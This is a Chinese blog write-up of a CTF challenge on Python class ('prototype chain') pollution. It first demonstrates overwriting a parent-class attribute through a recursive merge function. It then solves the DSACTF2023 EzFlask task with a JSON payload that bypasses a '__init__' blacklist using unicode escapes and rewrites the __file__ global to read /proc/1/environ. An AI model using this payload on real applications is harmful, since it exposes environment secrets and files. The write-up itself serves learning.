【CTF】Python原型链污染

已于 2023-08-05 13:15:53 修改
阅读量1.5k 收藏 9
点赞数 2
文章标签: python 开发语言 linux
于 2023-08-05 13:14:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Luminous_song/article/details/132118473
版权

Python原型链污染

原型链

在Python中每个对象都有一个原型,原型上定义了对象可以访问的属性和方法。当对象访问属性或方法时,会先在自身查找,如果找不到就会去原型链上的上级对象中查找,原型链污染攻击的思路是通过修改对象原型链中的属性,使得程序在访问属性或方法时得到不符合预期的结果。

原型链污染

和JavaScript的原型链污染差不多,都是需要merge函数来修改父类的属性

class father:
    secret = "hello"
class son_a(father):
    pass
class son_b(father):
    pass
def merge(src, dst):
    for k, v in src.items():
        print(f"k:{k}\t v:{v}")
        if hasattr(dst, '__getitem__'):
            if dst.get(k) and type(v) == dict:
                merge(v, dst.get(k))
            else:
                dst[k] = v
        elif hasattr(dst, k) and type(v) == dict:
            merge(v, getattr(dst, k))
        else:
            setattr(dst, k, v)
instance = son_b()
print(instance)
payload = {
    "__class__" : { 
        "__base__" : { # 有继承关系,使用__base__找父类
            "secret" : "world"
        }
    }
}
print(son_a.secret)
#hello
print(instance.secret)
#hello
merge(payload, instance)
# k:__class__      v:{'__base__': {'secret': 'world'}}
# getattr(dst,k):  <class '__main__.son_b'>
# k:__base__       v:{'secret': 'world'}
# getattr(dst,k):  <class '__main__.father'>
# k:secret         v:world
print(son_a.secret)
#world
print(instance.secret)
#world

在这个例子中:

  1. 首先在payload中读入__class__,都是查看对象所在的类,在instance中是有__class__这个属性,因此进入elif hasattr(dst, k) and type(v) == dict:这个语句中,继续执行merge
  2. merge其中输入的dst从原本的instance变为son_b这个类,而后使用__base__查看son_b中是否有父类,并寻找这个父类,根据语句elif hasattr(dst, k) and type(v) == dict继续执行merge
  3. merge其中dst变为father这个类,type(v)是字符串,则执行setattr(dst, k, v),father中的secret属性设置为world
  4. 因为父类的secret值改变,son_a的secret属性也寻找到father这个父类中,值也变为world

在这个例子中创建的对象instance对应的son_b类是存在父类的,但很多时候是没有父类的,此时就可以利用python的一些属性来寻找对应变量

全局变量获取

在Python中,函数或类方法均具有一个__globals__属性,该属性将函数或类方法所申明的变量空间中的全局变量以字典的形式返回,这样就可以用__globals__来修改想要修改的全局变量值

DSACTF2023七月暑期赛–EzFlask

进入靶机看到给出了源码

import uuid 
from flask import Flask, request, session 
import json

black_list = ["__init__".encode(),"__globals__".encode()]

app = Flask(__name__) 
app.secret_key = str(uuid.uuid4()) 
def check(data): 
    for i in black_list:
        print(i)
        if i in data: 
            print(i)
            return False 
    return True 
        
def merge(src, dst): 
    for k, v in src.items(): 
        if hasattr(dst, '__getitem__'): 
            if dst.get(k) and type(v) == dict: 
                merge(v, dst.get(k)) 
            else: dst[k] = v 
        elif hasattr(dst, k) and type(v) == dict: 
            merge(v, getattr(dst, k)) 
        else: setattr(dst, k, v) 
        
class user(): 
    def __init__(self): 
        self.username = "" 
        self.password = "" 
        pass 
    
    def check(self, data): 
        if self.username == data['username'] and self.password == data['password']: 
            return True 
        return False 

Users = [] 
@app.route('/register',methods=['POST']) 
def register(): 
    if request.data: 
        try: 
            print(request.data)
            print(json.loads(request.data))
            if not check(request.data):
                print("No check")
                return "Register Failed" 
            data = json.loads(request.data)
            print(data)
            if "username" not in data or "password" not in data: 
                print("no username or passwd")
                return "Register Failed" 
            User = user() 
            merge(data, User) 
            Users.append(User) 
        except Exception as e: 
            print("Exception: ",e)
            return "Register Failed"
        
        return "Register Success" 
    else: 
        print("no data")
        return "Register Failed" 

@app.route('/login',methods=['POST']) 
def login(): 
    if request.data: 
        try: 
            print(request.data)
            print(json.loads(request.data))
            data = json.loads(request.data).encode()
            if "username" not in data or "password" not in data: 
                return "Login Failed" 
            for user in Users: 
                if user.check(data): 
                    session["username"] = data["username"] 
                    return "Login Success" 
        except Exception: 
            return "Login Failed" 
        return "Login Failed" 
        
@app.route('/',methods=['GET']) 
def index(): 
    return open(__file__, "r").read() 
    
if __name__ == "__main__": 
    app.run(host="0.0.0.0", port=5010)

看到merge函数首先想到原型链污染,在index函数中是可以直接读取__file__对应的文件,因此想到利用merge函数去修改这个变量,将其变为我想看到的文件,可以看到register是创建了User对象,将data中的数值merge,那么就要在data中写上payload,在User类中重写了__init__类,同时__file__变量是一个全局值,就可以用上面写到的__globals__函数来获取全局变量并进行修改,最后再重新进入index中读取文件内容,因此最终payload为

data = {
	"username" : "admin", 
	"password" : "123456", # 在data中定义username和password保证data可以进入merge函数中
	"\u005F\u005F\u0069\u006E\u0069\u0074\u005F\u005F": { # 在check中可以看到有black_list,__init__被过滤了,使用unioncode进行绕过
		"__globals__" : {
			"__file__": "../../../proc/1/environ" # 大部分的flag都隐藏在环境变量中
		}
	}
}

参考资料

  1. Python原型链污染变体(prototype-pollution-in-python)
  2. 深入理解 JavaScript Prototype 污染攻击
  3. Python原型链污染
Luminous_song
关注
渗透攻击方法:原型链污染
txtxla的博客
08-05 1042
在计算机安全性方面,沙箱(沙盒、sanbox)是分离运行程序的安全机制,提供一个隔离环境以运行程序。通常情况下,在沙箱环境下运行的程序访问计算机资源会受到限制或者禁止,资源包括内存、网络访问、主机系统等等。沙箱通常用于执行不受信任的程序或代码,例如用户输入、第三方模块等等。其目的为了减少或者避免软件漏洞对计算机造成破坏的风险.
【web安全】Nodejs原型链污染分析
「 虚幻私塾」
02-14 871
Python微信订餐小程序课程视频 https://edu.csdn.net/course/detail/36074 Python实战量化交易理财系统 https://edu.csdn.net/course/detail/35475 Nodejs原型链污染分析 什么是js原型? 可以将js原型理解为其他OOP语言中的类,但还是有细微区别。 1. function F(){...} 2. var f = new F(); 分析: 1.创建一个func F,同时创立了一个F对象(该对象默认是接着Object的原
2024年网安最全Java中对象的比较_java定义比较总结(1)
2401_84264662的博客
05-01 64
在2.2中自定义类型equal方法比较的是两个变量的地址而不是大小,那要是硬要比较大小应该怎么做呢?我们可以覆写基类的equal方法@Override// 自己和自己比较// o如果是null对象,或者o不是Card的子类} // 注意基本类型可以直接比较,但引用类型最好调用其equal方法覆写的格式大同小异1. 如果两个变量都指向同一个变量那么返回true;2. 如果有传入的变量为null,那么返回false;
redpwnctf-web-blueprint-javascript 原型链污染学习总结
weixin_30376453的博客
08-19 272
前几天看了redpwn的一道web题,node.js的web,涉及知识点是javascript 原型链污染,以前没咋接触过js,并且这个洞貌似也比较新,因此记录一下学习过程 1.本机node.js环境安装 题目都给了源码,所以本地就可以直接安装package.json依赖并本地模拟调试 首先subline安装node环境: http://nodejs.org/ http...
原型链污染 --- 2022.04ctf
m0_63069714的博客
03-15 756
所以我们需要去修改devSettings.root的属性,网上追溯,如果要走到这个流程,必须改使得checkHost( )的值为ture,才能够进入merge方法中,对devSettings对象的值进行修改。JavaScript中,数组的下标可以用字符或是字符串数字来取值,所以在原型链中,我们可以给[ ]对象添加一个名称为1的属性,这样temp再通过下标1取值的时候,实际上取到的是数组中属性为1的值。接下来要做的,就是继续去替换devSettings.root的值了,替换body中的即可。
CATCTF wife原型链污染
qq_51796436的博客
02-21 1141
原型链污染原理:https://drun1baby.github.io/2022/12/29/JavaScript-%E5%8E%9F%E5%9E%8B%E9%93%BE%E6%B1%A1%E6%9F%93/如下代码,prototype是newClass类的一个属性。newClass实例化的对象newObj的.__proto__指向newClass类的JSON 解析的情况下,__proto__会被认为是一个真正的“键名”,而不代表“原型”。如果是则__proto__会被认为是o2的原型。
CTFshow--nodejs 原型链污染
pwfortune的博客
07-27 768
flag是一个变量, 但是也不可能知道flag的值是多少, 就不可能用上一道题的方法了.给了源码, 看到 login.js 里面有个copy() 函数。都是 对象, 在执行 copy 操作 ,构造一个请求体污染了。可以看到它的源码做了一点更改, 本地测试一下, 看看如何污染。这一题里面没有了 /api 路由 ,需要找到其他的污染口。是否有 ctfshow不重要, 让它的原型拥有就行,构造相应的query的值, 得到想要执行的结果。需要嵌套两层才能污染, 其他的跟上一题是一样的。
原型链污染
qq_53142368的博客
06-07 222
首先深入了解javascript 1,JavaScript一切皆对象, 2,对象都有一个__proto__属性,指向它的类的``prototype` 3,类是通过函数来定义的,定义的这个函数又是这个类的constructor属性值 4,每个构造函数constructor都有一个原型对象prototype 5,JavaScript使用prototype链实现继承机制 6,子类是可以通过prototype链修改其父类属性,以及爷爷类的属性值的 原型链污染 ......
CTF 离线C PHP python 汇编函数查询 chm电子书合集
10-06
Python函数查询手册将帮助你快速查询和应用Python库函数,解决各种CTF挑战。 5. **汇编语言函数查询**: 在逆向工程和二进制安全的CTF环节,汇编语言是必不可少的。汇编函数查询手册能指导你理解和解析二进制代码...
CTF密码学-Python古典密码加密解密脚本
04-30
CTF(Capture The Flag)是一种网络安全竞赛,其中密码学挑战是常见的环节,要求参赛者解决各种加密和解密问题。在这个压缩包中,我们有四个Python脚本,分别涉及摩斯密码、培根密码、ASCII编码和解码以及凯撒密码。...
ctf python大法好_CTF中RSA攻击方法总结
weixin_39978282的博客
12-21 1613
RSA近期因为一些比赛以及其他原因,总结了一些RSA方面的东西,于是在这里与大家分享,希望大家能有所收获,如有不当之处敬请批评指正。0x01 前言这里就不讨论数论的基础了,进行RSA的题目解答,至少要懂得基本的数论知识的,如果不了解数论的基本知识的话,网上相关内容还是挺多的。RSA基于一个简单的数论事实,两个大素数相乘十分容易,将其进行因式分解确实困难的。在量子计算机还没有成熟的今天,RSA算法凭...
[GYCTF2020]Ez_Express-原型链污染学习
cjdgg的博客
08-18 2343
[GYCTF2020]Ez_Express-原型链污染学习 最近学习下nodejs相关的题目,所以做了这道题 进入题目界面长这样 简单的试了下功能,也就是一个登录注册按钮,登陆后如下所示 要求需要ADMIN登录,这是一个不能注册的账户,而且我们又不知道密码 没法进行下去的时候试一试扫描目录,结果还真扫出了源代码 通过审代码我们发现,注册的时候调用了safeKeyword函数,这个函数使我们注册时不能用admin,但是又需要题目要求用ADMIN登录才行 这里我是正好看了做上一道js题目时收藏的tric
渗透攻击漏洞之——原型链污染
weixin_51525416的博客
08-02 3904
JavaScript 中所有的对象都有一个内置属性,称为它的prototype(原型)。它本身是一个对象,故原型对象也会有它自己的原型,逐渐构成了原型链原型链终止于拥有null作为其原型的对象上。指向对象原型的属性并不是prototype。它的名字不是标准的,但实际上所有浏览器都使用__proto__。访问对象原型的标准方法是 Object.getPrototypeOf()。JavaScript 规定,所有对象都有自己的原型对象(prototype)。
Nodejs原型链污染
最新发布
apple_74953689的博客
07-28 377
在攻防世界和CTF比赛中见过几道Nodejs原型链污染的题目,发现这是一个常考点,不得不整理了。首先解释一下原型链
NodeJS原型链污染
Aiwin的博客
05-11 1372
NodeJS原型链污染
安全基础 --- 原型链污染
m0_59598029的博客
03-04 1010
prototype:一个类的属性,所有类对象在实例化的时候会拥有prototype中的属性和方法proto:一个对象的__proto__属性,指向这个对象所在的类的prototype属性如果攻击者控制并修改了一个对象的原型,那将可以影响所有和这个对象来自同一个类、父类的对象,这种攻击方式就是原型链污染从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。
[GYCTF2020]Ez_Express 原型链污染
qq_54929891的博客
05-03 607
进入链接可以发现是一个登录界面 ,自己注册一个新账户的话登陆进去什么东西也没有,提示你要用ADMIN登录,我账户名用ADMIN的话,报错敏感信息 难道是一个烦人的注入题么,不急先扫一下站看看,发现有个www.zip压缩包泄露,将源码下载下来 可以了解到是一个js的题目,寻找一下跟登录有关的界面代码 router.post('/login', function (req, res) { if(req.body.Submit=="register"){ if(safeKeyword..
JavaScript Prototype污染攻击(CTF 例题分析)
a3320315的博客
11-03 2098
0x01 先谈谈自己的理解 function a(){} var b=new a() var c = {} a.__proto__.__proto__ == b.__proto__.__proto__ == c.__proto__ a.__proto__ != b.__proto__ != c 这个时候 b的__proto__ 指向的就是a.prototype a.prototype的_...
python原型链污染
08-20
Python原型链污染(Prototype Pollution)是指通过修改对象原型链中的属性,对程序的行为产生意外影响或利用漏洞进行攻击的一种技术。在Python中,每个对象都有一个原型,原型上定义了对象可以访问的属性和方法。当对象访问属性或方法时,会先在自身查找,如果找不到就会去原型链上的上级对象中查找。原型链污染攻击的思路是通过修改对象原型链中的属性,使得程序在访问属性或方法时得到不符合预期的结果。一些常见的原型链污染攻击包括修改内置对象的原型和修改全局对象的原型等。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [Python原型链污染](https://blog.csdn.net/Elite__zhb/article/details/131877828)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *3* [【CTFPython原型链污染](https://blog.csdn.net/Luminous_song/article/details/132118473)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值